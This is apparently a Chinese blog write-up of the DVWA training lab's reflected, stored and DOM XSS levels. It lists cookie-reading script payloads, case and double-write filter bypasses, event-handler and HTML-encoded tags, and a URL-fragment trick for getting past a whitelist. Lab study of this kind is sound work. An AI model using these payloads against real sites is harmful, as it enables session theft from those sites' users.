web-xss-dvwa

偷吃"游"的阿彪2023-08-14 15:07

目录

xss(reflected)

low

medium

high

xss(store)

low

medium

high

xss(dom)

low

medium

high

xss(reflected)

low

没有什么过滤,直接用最普通的标签就可以了

复制代码 
http://127.0.0.1/DVWA-master/vulnerabilities/xss_r/?name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E#

medium

大小写绕过

复制代码 
?name=<SCript>alert(document.cookie)<%2FSCript>

双写绕过

复制代码 
?name=<sc<script>ript>alert(document.cookie)<%2Fscript>

high

过滤规则:

name = preg_replace( '/\<(.*)s(.* )c(.*)r(.* )i(.*)p(.*)t/i', '', _GET[ 'name' ] ); 对任何模式的script都过滤了。

①换标签进行过滤

知识点:

autofocus 属性是一个 boolean(布尔) 属性。

autofocus 属性规定当页面加载时按钮应当自动地获得焦点。

payload:

复制代码 
?name=<a href="x" onfocus="alert(document.cookie)"; autofocus="">xss</a>

②进行html编码

复制代码 
<a href="&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#99;&#111;&#111;&#107;&#105;&#101;&#41;">test</a>

gpt直接转就可以了

xss(store)

low

直接再内容框中输入基本的xss语言就可以了

复制代码 
<script>alert(document.cookie)</script>

medium

先修改name的长度,让其写的下xss语句。再medium难度中,只能将代码写在name,写在内容里面是实现不了的

大小写绕过

复制代码 
<SCript>alert(document.cookie)</SCript>

双写绕过

复制代码 
<scr<script>ipt>alert(document.cookie)</script>

high

先修改name的长度,让其写的下xss语句。再high难度中,只能将代码写在name,写在内容里面是实现不了的

high难度要换标签才能实现,script完全被过滤掉了

复制代码 
<a href="x" onclick=alert(document.cookie)>xss</a>

<img src="x" onclick=alert(document.cookie)>

xss(dom)

low

直接写上最普通的xss语句就可以了

复制代码 
?default=<script>alert(document.cookie)</scrip

medium

select标签中只允许内嵌option标签,a、img标签嵌套再option标签中是无法实现器作用的。所以要先闭合option标签,然后再闭合select标签,这样子就可以了

复制代码 
?default="></option></select><a href="x" onclick=alert(1)>xss</a>

high

源代码

这里采用了白名单过滤的方法,只允许default值为 French English German Spanish 其中一个。

代码先判断defalut值是否为空,如果不为空的话,再用switch语句进行匹配,如果匹配成功,则插入case字段的相应值,如果不匹配,则插入的是默认的值。此时,在URL中添加注释#注释的内容不会提交到服务器,而是在浏览器执行

php 复制代码 
<?php
 
// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {
 
    # White list the allowable languages
    switch ($_GET['default']) {
        case "French":
        case "English":
        case "German":
        case "Spanish":
            # ok
            break;
        default:
            header ("location: ?default=English");
            exit;
    }
}
 
?>

payload:

复制代码 
?default=English#<script>alert(document.cookie)</script>
相关推荐
接着奏乐接着舞1 小时前
sse 两种调用方式
前端·javascript·vue.js
不会敲代码17 小时前
手写 Mini React:从 JSX 到虚拟 DOM 再到 render,搞懂 React 底层原理
前端·javascript·react.js
kyriewen8 小时前
你的代码仓库变成“毛线团”了?Monorepo 用 Turborepo 拆成“乐高积木”
前端·javascript·面试
身如柳絮随风扬8 小时前
你知道什么是 Ajax 吗?—— 从入门到原理,一篇彻底搞懂
前端·ajax·okhttp
旷世奇才李先生8 小时前
Vue3\+TypeScript 2026实战——企业级前端项目架构搭建与性能优化全指南
前端·架构·typescript
Beginner x_u9 小时前
前端八股整理(工程化 02)|CommonJS/ESM、Webpack Loader/Plugin 与Vite 对比
前端·webpack·node.js·plugin·loader
openKaka_9 小时前
createRoot 到底创建了什么:FiberRootNode 和 HostRootFiber 的初始化过程
前端·javascript·react.js
习明然10 小时前
UniApp开发体验感受总结
前端·uni-app
刀法如飞10 小时前
Claude Code Skills 推荐:2026年最值得安装的10个AI技能
前端·后端·ai编程
Lee川11 小时前
面试手写 KeepAlive:React 组件缓存的实现原理
前端·react.js·面试
热门推荐
01GitHub 镜像站点02Codex 接入 DeepSeek API 完整配置文档03要裂开了!ChatGPT要手机号验证了?注册Codex要求验证电话号码怎么办?2026年登陆Codex要手机号验证的解决办法04零基础教你claude code 接入 deepseek V405Dirtyfrag漏洞:我花了一下午搞清楚这个Linux内核提权漏洞到底在搞什么06CC-Switch & Claude 基于 Linux 服务器安装使用指南07Linux 核弹级高危漏洞 CVE-2026-31431 完整修复指南08裂开!ChatGPT 居然开始要手机号验证,附详细解决方法09CVE-2026-31431 (Copy Fail) 漏洞复现与验证记录102026 年 AI 辅助编程工具全景对比:Copilot、Cursor、Claude Code 与 Codex 深度解析